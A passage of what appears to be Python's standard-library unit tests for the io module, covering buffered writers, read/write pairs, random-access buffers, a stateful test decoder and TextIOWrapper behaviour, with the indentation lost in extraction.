bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
